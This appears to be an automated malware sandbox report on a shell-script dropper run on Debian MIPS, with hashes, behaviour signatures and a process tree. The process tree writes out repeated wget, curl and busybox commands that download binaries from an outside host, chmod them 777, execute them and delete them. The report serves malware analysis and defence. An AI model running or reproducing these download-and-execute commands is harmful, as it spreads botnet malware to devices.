Analysis
-
max time kernel
148s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
-
Size
10KB
-
MD5
ae125d61416f00e8ab77c13b1c87f06f
-
SHA1
a50cea28aa988684f1d031bd2504e6306371bd65
-
SHA256
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a
-
SHA512
762c6ad0536b762a73b4963dd635b801bada9f095ac7fbcb3ff72a12c880666640bab1383c1ad21571f47c02ddf9e0a832963df51ed819276b7dd8269e26830e
-
SSDEEP
192:Nr345Rs+M0oTailh1+HPCegD5BMzv2h1+HPd0oTaiB5BMzvar345Rx:Nr345Rs+M0oTaiJegD5BMzvR0oTaiB5e
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 936 chmod 847 chmod 866 chmod 894 chmod 901 chmod 922 chmod 929 chmod 737 chmod 821 chmod 859 chmod 887 chmod 915 chmod 806 chmod 873 chmod 880 chmod 943 chmod 950 chmod 752 chmod 778 chmod 908 chmod -
Executes dropped EXE 20 IoCs
ioc pid Process /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf 739 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n 753 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR 779 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ 807 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya 823 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 849 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr 860 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO 867 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 874 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y 881 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr 888 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g 895 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR 902 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv 909 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO 916 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya 923 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 930 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr 937 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv 944 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 951 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 802 busybox 865 busybox 879 busybox 946 wget 947 curl 940 curl 715 wget 844 busybox 858 busybox 869 wget 925 wget 810 wget 814 busybox 884 curl 905 curl 893 busybox 926 curl 748 busybox 774 busybox 853 wget 870 curl 876 wget 891 curl 907 busybox 890 wget 827 wget 783 wget 886 busybox 900 busybox 918 wget 953 wget 862 wget 743 curl 835 curl 877 curl 898 curl 949 busybox 932 wget 942 busybox 764 curl 863 curl 933 curl 935 busybox 758 wget 812 curl 897 wget 919 curl 921 busybox 734 busybox 791 curl 914 busybox 928 busybox 722 curl 872 busybox 904 wget 912 curl 742 wget 856 curl 883 wget 911 wget 939 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR curl File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ curl File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya curl File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g curl File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR curl File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 curl File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y curl File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 curl File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n curl File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 curl File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr curl File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya curl File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv curl File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf curl File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr curl File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO curl File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 curl File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv curl File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO curl File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr curl
Processes
-
/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:782
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:809
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:810
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:953
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
